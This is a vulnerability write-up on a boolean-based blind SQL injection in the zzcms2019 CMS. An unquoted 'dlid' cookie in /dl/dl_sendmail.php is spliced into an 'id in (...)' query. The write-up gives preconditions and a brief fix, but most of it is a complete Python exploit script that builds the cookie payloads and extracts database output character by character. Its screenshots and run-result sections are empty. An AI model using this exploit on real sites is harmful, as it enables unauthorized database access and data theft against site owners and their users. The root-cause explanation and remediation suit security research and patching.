
zzcms2019 SQL injection vulnerability in dl_sendmail.php

A local test environment was set up to run zzcms2019.

The vulnerability is at line 71 of /dl/dl_sendmail.php; the relevant code is:

// Branch on whether the cookie looks like a comma-separated id list.
// (This line is garbled as rendered here; the access it makes is the same
// @$_COOKIE['dlid'] read used in the two queries below.)
If (strpos (@ $_COOKIE [' dlid], ", ") > 0) {

// SINK: the raw cookie value is concatenated inside "id in (...)" with no
// surrounding quotes, so a payload that contains no quote character is never
// affected by quote escaping. A trailing "#" in the value would also comment
// out the "order by ... limit" suffix (the exploit below relies on this).
$SQL ="select email from zzcms_dl where passed=1 and id in (".@$_COOKIE['dlid'].") order by id asc limit $n,$size";

} else {

// Single-id form: here the value is wrapped in single quotes, so the global
// cookie escaping the write-up mentions would be relevant for this branch.
$SQL ="select email from zzcms_dl where passed=1 and id='".@$_COOKIE['dlid']."'";

}

Look at `and id in (".@$_COOKIE['dlid'].")`:

The cookie value is concatenated into the query without surrounding quotes, so the attacker never has to supply a single quotation mark. Because the payload contains no quote characters, zzcms2019's global escaping of cookie values has nothing to act on and is ineffective here; the result is a boolean-based blind SQL injection that needs no single quotation mark. The fix is to validate each comma-separated element of `dlid` as an integer (cast with `intval()` or bind as a parameter) before it reaches the query.

Preconditions: register a company-type account on the front end, then in the user center go to Email/SMS content settings → add email/SMS content → email → set it as the default.

No additional user-group privileges are required for the test.

Response of the page without the injected cookie:

Construct the payload and request /dl/dl_sendmail.php with the injected cookie; the page then returns:

The complete exploit is as follows:

#coding: utf-8
import string
import sys

import requests

# Target endpoint; the host placeholder is filled in when the request is built.
url = 'http://{}/dl/dl_sendmail.php'

# Request headers. Host and Cookie are templates filled in from main().
# Adjust them to match the environment under test.
headers = dict([
    ('Host', '{}'),
    ('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0'),
    ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
    ('Accept-Language', 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'),
    ('Accept-Encoding', 'gzip, deflate'),
    ('Content-Type', 'application/x-www-form-urlencoded'),
    ('Connection', 'keep-alive'),
    ('Cookie', '{}'),
])

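def _dlid_payload(sql, position, char_code):
    """Build the ``dlid`` cookie value that asks one yes/no question.

    The question is "does byte *position* of *sql*'s result have ASCII code
    *char_code*?". The server splices the cookie unquoted into
    ``id in (...)``: the leading ``0,`` makes strpos() see a comma and take
    the IN branch, the surplus ``)`` closes the IN list, and ``#`` comments
    out the trailing ``order by ... limit``. No quote character is needed,
    so cookie escaping never fires.
    """
    condition = "ascii(substr(({}),{},1)))={}".format(sql, position, char_code)
    return "0,(if((({}),1,0)))#".format(condition)


def Sqli(host, sql, *, oracle=None, session=None, timeout=10, max_length=None,
         url_template=None, request_headers=None):
    """Extract the result of *sql* one character at a time via the dlid cookie.

    For every position the candidates in ``string.printable`` are tried in
    turn; the first one for which *oracle* reports TRUE is taken, and the
    extraction stops at the first position where nothing matches (the server
    returns ascii('') = 0 past the end of the string, which no printable
    character has).

    Args:
        host: ``host[:port]`` substituted into the URL template.
        sql: SELECT whose single-row, single-column result is read.
        oracle: ``callable(text) -> bool`` returning True when the injected
            condition was TRUE. Defaults to "``</html>`` is absent from the
            body", which is what the reference environment showed; adjust
            it for other deployments.
        session: object providing ``get(url, headers=, timeout=)``. A fresh
            ``requests.Session`` is created and closed when omitted.
        timeout: per-request timeout in seconds (the original had none, so a
            stalled server hung the script).
        max_length: optional cap on the number of characters extracted; a
            miscalibrated oracle that always answers TRUE would otherwise
            loop forever.
        url_template / request_headers: override the module-level ``url``
            and ``headers``. Neither global is mutated any more, so the
            function can be called repeatedly.

    Returns:
        The extracted string (it is also printed as it grows).
    """
    if oracle is None:
        oracle = lambda text: "</html>" not in text
    target = (url if url_template is None else url_template).format(host)
    base_headers = dict(headers if request_headers is None else request_headers)
    cookie_prefix = base_headers.get('Cookie')

    own_session = session is None
    if own_session:
        session = requests.Session()

    res_data = ""
    try:
        position = 1
        while True:
            if max_length is not None and len(res_data) >= max_length:
                print('完成')
                return res_data
            found = None
            for c in string.printable:
                probe = _dlid_payload(sql, position, ord(c))
                # Per-request copy so the shared headers dict is never modified.
                probe_headers = dict(base_headers)
                if cookie_prefix:
                    probe_headers['Cookie'] = cookie_prefix + "; dlid=" + probe
                else:
                    probe_headers['Cookie'] = "dlid=" + probe
                res = session.get(target, headers=probe_headers, timeout=timeout)
                if oracle(res.text):
                    found = c
                    break
            if found is None:
                # No candidate matched: we ran past the end of the result.
                print('完成')
                return res_data
            res_data += found
            print(res_data)
            position += 1
    finally:
        if own_session:
            session.close()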

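if __name__ == "__main__":
    # Usage: python exp.py [host[:port]] [cookie]
    # Both arguments fall back to the lab values below, so the script runs
    # unchanged; the cookie must belong to a logged-in front-end (company)
    # account, as described in the write-up.
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1:9000"
    user_cookie = sys.argv[2] if len(sys.argv) > 2 else "PHPSESSID=dh6bhd10g47tjc4jlhqf2leqnn; UserName=test; PassWord=343b1c4a3ea721b2d640fc8700db0f36"
    # Query whose result is extracted; it must yield exactly one row/column.
    sql = "select group_concat(user(),version(),@@version_compile_os)"
    headers['Host'] = headers['Host'].format(host)
    headers['Cookie'] = headers['Cookie'].format(user_cookie)
    Sqli(host, sql)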

Exploit run result: